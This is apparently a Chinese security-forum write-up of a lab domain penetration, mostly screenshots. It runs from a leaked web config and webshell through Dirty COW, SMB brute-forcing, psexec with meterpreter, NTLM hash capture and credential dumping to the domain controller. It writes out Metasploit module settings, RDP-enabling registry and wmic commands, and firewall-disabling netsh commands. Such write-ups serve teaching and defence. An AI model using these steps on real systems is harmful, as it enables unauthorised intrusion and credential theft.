问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
记一次曲折的域渗透
渗透测试
记一次曲折的域渗透
0x01 环境信息 ========= 配置信息 centos IP1:192.168.1.132 IP2:192.168.93.100 应用:web ubuntu IP:192.168.93.120 Win server2012 IP:192.168.93.10 Win server2008 IP:192.168.93.20 Win 7 IP:192.168.93.30 kali IP:192.168.1.128 0x02 WEB渗透 ========== 2.1 端口扫描 -------- 192.168.1.132 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-0a2f554d0128a472cd2eac9b5ff920b746ca1bb9.png) 发现存在80端口,访问发现网站 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-81b9d6fe1c8ba8866ff0d66a95289320b97dd973.png) 2.2 目录扫描 -------- 发现1.php文件是phpinfo ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-b58b8790d7a869c4be661a4689ae170c7c27ad4a.png) README中找到版本信息 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-065c92e68f409e6d27b7f6ef633e8bd7128211a9.png) 发现configuration.php文件 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-1cdbc2b52c98f8692bbce74898c21bb81931cae5.png) 发现该文件泄漏的数据库用户名和密码,以及数据库名等信息 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-1687b38303b8c587f21dece0d9c4777e6d5cf205.png) 2.3 后台登陆 -------- 3306端口开放,尝试远程登录目标mysql 在am2zu\_users中找到用户名密码文件 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-46ceaea9970bcbb8c10ceba68ae63f41579304eb.png) 根据官网给出的加盐密码可以创建一个用户 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-cc9139b1aace2ff55de1e7019261beb3d9ce9581.png) 这里创建一个admin123的用户密码是admin ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-292c45d16cc363371a97cfe43eab667fd5af36c8.png) 成功登陆到后台 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-abebce38bccd1e194c77314ba3ad465a02f3f49d.png) 2.4 Getshell ------------ 后台发现修改文件内容 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-18353a02bb3dc965f6e6e77b25a2f8947c813047.png) 写入一句话,位置templates/beez3/index.php 连接一句话 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-5c501b122c87f383e9d55fc62f8b88286e24b605.png) 2.5 绕过disable ------------- 连接后发现不能执行命令,查看disable\_funtions ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-22252c7684acb4a508a7366cebd0506523ab1d14.png) 利用蚁剑绕过disable ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-31749844c6ff259ef8c4bcb16653c42268643aee.png) 发现真实WEB服务IP地址为192.168.93.120 而centos则是提供反向代理的Nginx服务器192.168.93.100 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-2055cbf4612acc0d50ed33a6c5fd237c14636dac.png) 在mysql中发现用户名密码 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-e3394f01b6a0eda6a36b75bef745bcf01636c447.png) 2.6 远程登录 -------- ssh远程登录、查看内核和ip ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-eacabf2037871526416b41c6c725d409df6c6af3.png) 登录后是低权限用户,使用脏牛提权 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-81f3ae850d38a2981840d03b47a01153da2580cc.png) 查看用户权限 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-a27e90023ac89c30dcfe8a99a87781461556caa1.png) 0x03 后渗透 ======== 3.1 上线msf --------- ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-32fdb9ca8645a74591dd0bd95f9187dc4dd7481c.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-f966b9116f445d15db4a07d1554c948aa7c299ed.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-63ea276381b352e4a310307004f024382ad98f83.png) 添加内网路由 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-d0fd2a8d1810424f4279a84bff75f86a082527b4.png) 新建一个socket代理 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-aac55dbe4a85c1eb92381c1f784a0e4b7be9ed30.png) 3.2 内网扫描 -------- ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-5cf0178d4441653433c776f3ecdc1ea1e8458745.png) 3.3 win7(192.168.93.30) ----------------------- ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-d276c6deef1090c47b6375ea0434cec888927f46.png) 开放了445端口,这里尝试使用scanner模块SMB远程登陆爆破 use auxiliary/scanner/smb/smb\_login set rhosts 192.168.93.30 set PASS\_FILE /root/Desktop/SMB.txt set SMBUSER administrator ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-16d209e02354898cded35c7cb7a3520be5f45a5d.png) 这里爆破出密码123qwe!ASD **PSEXEC\*\***传递\*\* use exploit/windows/smb/psexec set payload windows/x64/meterpreter/bind\_tcp set rhosts 192.168.93.30 set smbuser administrator set smbpass 123qwe!ASD ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-b3f3100a831006c6a5314a327aca0ea96fb533ee.png) 信息收集 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-cae8fff69299cffb8cb5d589d6c3d2714e09748d.png) 这里拿到win7权限没有发现有用的信息 3.4 win2008(192.168.93.20) -------------------------- ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-f6f7c4a2b91c8c988536a001f55f76ac6e3e6468.png) 这里可以看到开放了1433端口 使用之前得到的mssql数据库密码可以登陆 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-71b689bdd56df9dad364ecf25aa81225d77d9f8b.png) 使用[Responder.py](https://github.com/SpiderLabs/Responder)来伪造smb服务器来获取hash,然后利用mssql来进行触发验证 使用auxiliary/admin/mssql/mssql\_ntlm\_stealer,执行xp\_dirtree,触发UNC 最后使用john破解密码 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-4f1f1e14de035cdffead2636bd2ecce8dd2ba692.png) 使用vmiexec获取命令行 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-a57fb364a7c87324bfcbfcc99cb8983acbacc448.png) **开启3389** 设置远程桌面端口 reg add "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" /t REG\_DWORD /v portnumber /d 3389 /f 开启远程桌面 wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 检查端口状态 netstat -an|find "3389" 关闭远程桌面 wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-12b6f26a7e172b5d979e1ea58d680c1490a4d4c5.png) 远程登陆,并上传一个正向监听 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-5c12d487b24bb92c8f9b1e30180126374b3f8e93.png) 成功上线 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-224bd46957e263b1f1ac899bcccc93913ef8cc16.png) 首先提权到SYSTEM ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-9e13a38c243e9e8c577cfeabf997e70be13ac7dd.png) kiwi和hashdump查看凭证 获得域用户Administrator的密码为zxcASDqw123!! ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-6b71dc93268eb594608b03490527532d2b5f5603.png) 3.5 Win2012-域控(192.168.93.10) ----------------------------- 取得密码这里直接wmiexec获取cmd ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-9659270d42ef9ab30548592490d94bff25ce91e5.png) 开启3389 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-130d9706ed5eee486c039818d9e95dfc97d229fa.png) 关闭防火墙 netsh firewall set opmode mode=disable #此处使用这条成功关闭防火墙 netsh advfirewall set allprofiles state off ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-cdf2066372ef44806de5f1a82be83998b5b009ad.png) 使用windows登陆最终拿下域控,最后做一下迁移和域信息收集 ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/05/attach-33bb4f9d37353cd1e9e1060118be392caa29fc90.png)
发表于 2022-05-27 14:24:02
阅读 ( 5630 )
分类:
漏洞分析
1 推荐
收藏
0 条评论
请先
登录
后评论
山石网科安研院
7 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!